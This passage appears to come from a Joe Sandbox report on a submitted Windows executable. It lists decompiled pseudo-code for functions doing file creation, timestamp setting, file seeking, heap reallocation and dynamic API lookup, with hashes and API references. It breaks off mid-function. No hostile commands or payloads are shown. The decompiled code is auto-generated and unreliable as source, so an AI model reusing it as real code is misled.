__EH_prolog.LIBCMT ref: 01001385

Part of subcall function 01006057: __EH_prolog.LIBCMT ref: 0100605C

Part of subcall function 0100C827: __EH_prolog.LIBCMT ref: 0100C82C
Part of subcall function 0100C827: new.LIBCMT ref: 0100C86F
Part of subcall function 0100C827: new.LIBCMT ref: 0100C893

new.LIBCMT ref: 010013FE

Part of subcall function 0100B07D: __EH_prolog.LIBCMT ref: 0100B082

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fdf41274ef9a7992b39bb2bdf0a2e174869098840e290a2cc012e80fc29e19ed
Instruction ID: 1d49152d37f72268b4fb78a75d783c63800103e2d46c074031853bee4a95ef99
Opcode Fuzzy Hash: fdf41274ef9a7992b39bb2bdf0a2e174869098840e290a2cc012e80fc29e19ed
Instruction Fuzzy Hash: 214123B0805B419EE725DF798884AE7FBE5FF28300F444A6ED6EE83281DB326554CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0102B188, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0102B188(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E01028FA5(__ebx, __ecx, __edx);
				E0102B2AE(__ebx, __ecx, __edx, _t81);
				_t31 = E0102AF1B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E01028518(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0102B350(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E010282CF();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x103eb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x103eb20) {
								E010284DE( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x103eda0 & 0x00000001;
							if(( *0x103eda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0102ADF1(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x103ed40; // 0x33f2d08
									 *0x103e814 = _t44;
								}
							}
						}
						L6:
						E010284DE(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E0102895A())) = 0x16;
						goto L5;
					}
				}
			}

0x0102b188
0x0102b195
0x0102b198
0x0102b1a0
0x0102b1a9
0x0102b1ac
0x0102b1b2
0x00000000
0x0102b1b4
0x0102b1b8
0x0102b1c5
0x0102b1c7
0x0102b1cb
0x0102b1cd
0x0102b1fd
0x0102b1fd
0x00000000
0x0102b1cf
0x0102b1dc
0x0102b1e2
0x0102b1e5
0x0102b1ea
0x0102b1ee
0x0102b1f0
0x0102b20f
0x0102b213
0x0102b215
0x0102b215
0x0102b220
0x0102b224
0x0102b225
0x0102b227
0x0102b22a
0x0102b231
0x0102b236
0x0102b23b
0x0102b231
0x0102b23c
0x0102b242
0x0102b247
0x0102b249
0x0102b24c
0x0102b24f
0x0102b256
0x0102b258
0x0102b25f
0x0102b264
0x0102b26d
0x0102b272
0x0102b278
0x0102b27a
0x0102b27f
0x0102b27f
0x0102b278
0x0102b25f
0x0102b1ff
0x0102b200
0x00000000
0x0102b1f2
0x0102b1f7
0x00000000
0x0102b1f7
0x0102b1f0

APIs

Part of subcall function 01028FA5: GetLastError.KERNEL32(?,01040EE8,01023E14,01040EE8,?,?,01023713,00000050,?,01040EE8,00000200), ref: 01028FA9
Part of subcall function 01028FA5: _free.LIBCMT ref: 01028FDC
Part of subcall function 01028FA5: SetLastError.KERNEL32(00000000,?,01040EE8,00000200), ref: 0102901D
Part of subcall function 01028FA5: _abort.LIBCMT ref: 01029023

Part of subcall function 0102B2AE: _abort.LIBCMT ref: 0102B2E0
Part of subcall function 0102B2AE: _free.LIBCMT ref: 0102B314

Part of subcall function 0102AF1B: GetOEMCP.KERNEL32(00000000,?,?,0102B1A5,?), ref: 0102AF46

_free.LIBCMT ref: 0102B200
_free.LIBCMT ref: 0102B236

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 0dc8d11482b1ce0a638e869a97cb18cdac2bc64a888f1cc716f2052665fcac28
Instruction ID: 71825a99f0bf2c04f8ac83e50ac7b6ba69cf0de542083eea14c9b5b500c5985e
Opcode Fuzzy Hash: 0dc8d11482b1ce0a638e869a97cb18cdac2bc64a888f1cc716f2052665fcac28
Instruction Fuzzy Hash: A3312731900329AFDB11EFADD440BADBBF5EF41320F6540DAE9989B291EB369D41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0100971E, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100971E(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0101E360();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x22)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x1c) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0100BC69(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0100B66C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x18)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0100FE56(_t59 + 0x24, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x01009723
0x01009729
0x01009736
0x01009738
0x0100973e
0x0100974c
0x0100974c
0x01009746
0x01009746
0x01009746
0x01009756
0x0100976b
0x01009774
0x0100977a
0x01009784
0x00000000
0x01009786
0x01009786
0x0100978a
0x0100978c
0x0100978c
0x01009792
0x01009792
0x01009792
0x01009796
0x01009796
0x010097a6
0x010097ac
0x010097ac
0x010097b3
0x010097e1
0x010097e1
0x010097f3
0x010097f8
0x010097fb
0x01009814

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01009EDC,?,?,01007867), ref: 010097A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01009EDC,?,?,01007867), ref: 010097DB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5bdf362d8d6e5287361bad8d62f703e5526d67502ce7741e3841abe8910ae721
Instruction ID: 9a06ff0bf8879bbffadf5450ca09551026ca5ffb011352a0524a0e65fc4c11ec
Opcode Fuzzy Hash: 5bdf362d8d6e5287361bad8d62f703e5526d67502ce7741e3841abe8910ae721
Instruction Fuzzy Hash: 1621F6B2104749AFF7328E24C885BA7B7E8FB49768F00495DF5ED821D2C375A8858B61

Uniqueness

Uniqueness Score: -1.00%

Function 01009D62, Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E01009D62(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x1c) != 0x100 && ( *(__ecx + 0x1c) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E01010BDD(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E01010BDD(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E01010BDD(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x01009d62
0x01009d68
0x01009d71
0x01009d7c
0x01009d7c
0x01009d82
0x01009d88
0x01009d8b
0x01009d98
0x01009d94
0x01009d94
0x01009d94
0x01009d9a
0x01009d9b
0x01009d9f
0x01009da5
0x01009db2
0x01009db2
0x01009da7
0x01009dac
0x01009db0
0x00000000
0x00000000
0x01009db0
0x01009db7
0x01009dbd
0x01009dc7
0x01009dc7
0x01009dcb
0x01009dd2
0x01009dd2
0x01009ddc
0x01009de5
0x01009de5
0x01009ded
0x01009df6
0x01009df6
0x01009e06
0x01009e14
0x01009e24
0x01009e2c
0x01009e38

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,01007547,?,?,?,?), ref: 01009D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E2C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: b4941b47fbf6da04ac7b59ea0455e4a8f1affef0b19e05e63b76a55807b9bffe
Instruction ID: 7051cc91f6d8164e148b02d7d63721bcb43dd9bc3ffc14e846cfd63b206b474f
Opcode Fuzzy Hash: b4941b47fbf6da04ac7b59ea0455e4a8f1affef0b19e05e63b76a55807b9bffe
Instruction Fuzzy Hash: 69210731188246ABE712EE28C491EABBFE4AF9120CF04089EF5D5C7182C729DA0CDB51

Uniqueness

Uniqueness Score: -1.00%

Function 0102A458, Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0102A458(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x1061630 + _a4 * 4;
				_t27 =  *0x103e668; // 0x7ecdc17e
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x103e668; // 0x7ecdc17e
							goto L13;
						}
						 *_t20 = E0101E531(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E0102A4F4( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x103e668; // 0x7ecdc17e
						goto L7;
					}
					_t27 =  *0x103e668; // 0x7ecdc17e
					goto L8;
				}
				L2:
				return _t33;
			}

0x0102a463
0x0102a46c
0x0102a472
0x0102a47c
0x0102a47e
0x0102a482
0x0102a4ed
0x00000000
0x0102a4ed
0x0102a486
0x0102a48c
0x0102a492
0x0102a4ae
0x0102a4ae
0x0102a4b0
0x0102a4b2
0x0102a4dd
0x0102a4df
0x0102a4e7
0x0102a4eb
0x00000000
0x0102a4eb
0x0102a4be
0x0102a4c2
0x0102a4d7
0x00000000
0x0102a4d7
0x0102a4cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0102a494
0x0102a494
0x0102a496
0x0102a49e
0x00000000
0x00000000
0x0102a4a0
0x0102a4a6
0x00000000
0x00000000
0x0102a4a8
0x00000000
0x0102a4a8
0x0102a4cf
0x00000000
0x0102a4cf
0x0102a488
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,01033958), ref: 0102A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0102A4C5

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 87a7e79d36188a2651c12586f07c196db1d88a069364bfed9d03a1bcc5995929
Instruction ID: dc165d00a373a3be898106fc235b12f403b014618d1af4bfdf88170c746ebac7
Opcode Fuzzy Hash: 87a7e79d36188a2651c12586f07c196db1d88a069364bfed9d03a1bcc5995929
Instruction Fuzzy Hash: 3111C633B11631DFAB369D2CE8448AA77D5ABC42607064261FE95EBA48EE39DC41C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 01009B59, Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01009B59(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E010098E5(_t28);
						} else {
							 *0x1033260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x01009b59
0x01009b5b
0x01009b61
0x01009bdb
0x00000000
0x01009bdb
0x01009b64
0x01009b69
0x01009b6d
0x01009b6f
0x01009ba9
0x01009b77
0x01009b77
0x01009b7d
0x01009b82
0x01009b9c
0x01009b84
0x01009b8d
0x01009b95
0x01009b97
0x01009ba1
0x01009ba3
0x01009ba5
0x01009ba5
0x01009b7d
0x01009baf
0x01009bc0
0x01009bcb
0x00000000
0x01009bd7
0x00000000
0x01009bd7

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,01009B35,?,?,00000000,?,?,01008D9C,?), ref: 01009BC0
GetLastError.KERNEL32 ref: 01009BCD

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: f1009546be6a561d81877505ce42b18d56f1a55066e04a4c75384dc0203af9ea
Instruction ID: 12c18e71cfd2b0e19764e6d4ee3a8adc246923024e931d37681a50de13045fa9
Opcode Fuzzy Hash: f1009546be6a561d81877505ce42b18d56f1a55066e04a4c75384dc0203af9ea
Instruction Fuzzy Hash: 530166313046059FAB0ACE298A9487EB399BFC0335F40452DF99A872C2DB31D8048B21

Uniqueness

Uniqueness Score: -1.00%

Function 01009E40, Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E01009E40() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x1a)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E01006FA5(0x1040f50, 0x1040f50, _t34 + 0x24);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x1a)) == 0) {
					return _t22;
				}
				E01006FA5(0x1040f50, 0x1040f50, _t34 + 0x24);
				goto L3;
			}

0x01009e44
0x01009e46
0x01009e51
0x01009e64
0x01009e64
0x01009e76
0x01009e7c
0x01009e80
0x01009e9d
0x01009ea3
0x01009ea8
0x01009eaa
0x00000000
0x01009e8c
0x01009e90
0x01009eb9
0x01009ead
0x00000000
0x01009ead
0x01009e98
0x00000000
0x01009e98
0x01009e80
0x01009e57
0x00000000
0x01009eb5
0x01009e5f
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 01009E76
GetLastError.KERNEL32 ref: 01009E82

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 32882a7966a7cb193c3776eb1d5523de83d48c1cadb91487613a7e9f7190ebe5
Instruction ID: 6ca5f0c2a34c96bd5605fade593e36642b020ba8dfc3b73e952e52693ad2f729
Opcode Fuzzy Hash: 32882a7966a7cb193c3776eb1d5523de83d48c1cadb91487613a7e9f7190ebe5
Instruction Fuzzy Hash: 5C01B5713042405BFB359E69CC8476BB7D99B84318F04493DB2CAC36C1DB35EC488711

Uniqueness

Uniqueness Score: -1.00%

Function 01028606, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E01028606(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0x10616ec, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E01028394();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E010271AD(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E0102895A())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E010284DE(_t14);
					goto L6;
				}
				_t9 = E01028518(__ecx, _a8); // executed
				return _t9;
			}

0x01028606
0x01028606
0x0102860c
0x01028611
0x0102861f
0x01028622
0x01028624
0x0102862f
0x01028632
0x01028659
0x01028663
0x01028669
0x0102866b
0x00000000
0x00000000
0x0102864a
0x0102864c
0x00000000
0x00000000
0x0102864f
0x01028654
0x01028655
0x01028657
0x00000000
0x00000000
0x01028657
0x01028641
0x00000000
0x01028641
0x01028634
0x01028639
0x0102863f
0x0102863f
0x0102863f
0x00000000
0x0102863f
0x01028627
0x00000000
0x0102862c
0x01028616
0x00000000

APIs

_free.LIBCMT ref: 01028627

Part of subcall function 01028518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102C13D,00000000,?,010267E2,?,00000008,?,010289AD,?,?,?), ref: 0102854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,01040F50,0100CE57,?,?,?,?,?,?), ref: 01028663

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 3c89527dc03d9a70b5cbbc103f3a46f8f5772718bb1832204b96942c0fd1c5bb
Instruction ID: c0ee8621783476235cb53e19e11c900710cfbbe0f3c045e2892ef9d9803e457c
Opcode Fuzzy Hash: 3c89527dc03d9a70b5cbbc103f3a46f8f5772718bb1832204b96942c0fd1c5bb
Instruction Fuzzy Hash: BAF02B3D2011366ADB712A29AC0CFAF3BDC9FE9AB0F14C197E8D896190DF34C80085A5

Uniqueness

Uniqueness Score: -1.00%

Function 01010908, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01010908(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
